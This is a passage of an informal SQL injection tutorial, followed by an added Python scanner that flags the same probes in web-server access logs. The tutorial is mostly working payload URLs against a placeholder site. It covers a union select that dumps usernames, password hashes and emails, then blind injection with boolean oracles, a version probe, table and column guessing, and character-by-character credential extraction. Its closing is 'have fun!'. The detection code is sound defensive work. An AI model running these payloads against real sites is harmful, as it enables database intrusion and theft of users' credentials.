    http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
    what we get here is user:pass:email from table users.
    example: admin:hash:[email protected]
    that's all in this part, now we can proceed to the harder part


    2. blind sql injection
    blind injection is a little more complicated than the classic injection but it can be done
    i must mention, there is a very good blind sql injection tutorial by xprog, so it's not bad to read it
    let's start with the advanced stuff.
    i will be using our example
    http://www.site.com/news.php?id=5
    when we execute this, we see some page and articles on that page, pictures etc…
    then when we want to test it for a blind sql injection attack
    http://www.site.com/news.php?id=5 and 1=1 <— this is always true
    and the page loads normally, that's ok.
    now the real test
    http://www.site.com/news.php?id=5 and 1=2 <— this is false
    so if some text, picture or some content is missing on the returned page then that site is vulnerable to blind sql injection.


    1) get the mysql version
    to get the version in a blind attack we use substring
    i.e
    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
    this should return true if the version of mysql is 4.
    replace 4 with 5, and if the query returns true then the version is 5.
    i.e
    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5


    2) test if subselect works
    when select doesn't work then we use subselect
    i.e
    http://www.site.com/news.php?id=5 and (select 1)=1
    if the page loads normally then subselects work.
    then we're gonna see if we have access to mysql.user
    i.e
    http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
    if the page loads normally we have access to mysql.user and then later we can pull some passwords using the load_file() function and outfile.


    3). check table and column names
    this is the part where guessing is your best friend
    i.e.
    http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, because the subselect returns only 1 row, this is very important.)
    then if the page loads normally without content missing, the table users exists.
    if you get false (some article missing), just change the table name until you guess the right one
    let's say that we have found that the table name is users, now what we need is the column name.
    the same as with the table name, we start guessing. like i said before, try the common names for columns.
    i.e
    http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
    if the page loads normally we know that the column name is password (if we get false then try common names or just guess)
    here we merge 1 with the column password, then substring returns the first character (,1,1)


    4). pull data from database
    we found table users and columns username, password so we're gonna pull characters from that.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>80
    ok this here pulls the first character from the first user in table users.
    substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ascii value
    and then compares it with the symbol greater than > .
    so if the ascii char is greater than 80, the page loads normally. (true)
    we keep trying until we get false.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>95
    we get true, keep incrementing
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>98
    true again, higher
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),1,1))>99
    false!!!
    so the first character in username is char(99). using the ascii converter we know that char(99) is the letter 'c'.
    then let's check the second character.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),2,1))>99
    note that i changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),2,1))>99
    true, the page loads normally, higher.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),2,1))>107
    false, lower number.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),2,1))>104
    true, higher.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0x3a,password) from users limit 0,1),2,1))>105
    false!!!
    we know that the second character is char(105) and that is 'i'. we have 'ci' so far
    so keep incrementing until you get to the end. (when >0 returns false we know that we have reached the end).


    there are some tools for blind sql injection, i think sqlmap is the best, but i'm doing everything manually,
    because that makes you a better sql injector
    hope you learned something from this paper.
    have fun!
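From the defender's side, the union-based enumeration and the blind character-at-a-time probing described in this post leave a very recognisable trail in web-server access logs. The following Python scanner is an added example, not code from the original post: it percent-decodes each request URL, flags the probe shapes used above (the 1=1 / 1=2 oracle, the substring(@@version) check, ascii(substring()) extraction, information_schema enumeration and union all select), groups hits per client IP, and notes when that client has received two different response sizes for its probes, which is exactly the true/false signal a blind attacker reads. The log lines, regex names and field names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post), modelled on
# the probing sequence above: 1=1 / 1=2, @@version check, ascii(substring()) extraction.
LOG_LINES = [
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 3100',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=5%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=5%20and%20ascii(substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=5%20and%20ascii(substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>99 HTTP/1.1" 200 3100',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4980',
]

# Common log format: ip ident user [time] "method url proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)')

# One regex per probe shape used in the tutorial; URLs are percent-decoded before matching
SIGNATURES = {
    "boolean_oracle": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*@@version", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "union_dump": re.compile(r"union\s+all\s+select", re.I),
}

def classify(url):
    """Return the names of the signatures that match one request URL (in SIGNATURES order)."""
    decoded = unquote_plus(url)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def analyse(lines):
    """Group flagged requests per client IP; two distinct response sizes mean the true/false oracle is observable."""
    flagged = defaultdict(lambda: {"requests": 0, "tags": set(), "sizes": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        tags = classify(m["url"])
        if not tags:
            continue  # ordinary traffic
        entry = flagged[m["ip"]]
        entry["requests"] += 1
        entry["tags"].update(tags)
        entry["sizes"].add(int(m["bytes"]))
    for entry in flagged.values():
        entry["oracle_visible"] = len(entry["sizes"]) > 1
    return dict(flagged)
```

Because the oracle itself is a consistent size difference between "true" and "false" pages, correlating the response size with the flagged query is a far stronger signal than any single regex hit; parameterised queries on the application side remove the oracle entirely.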
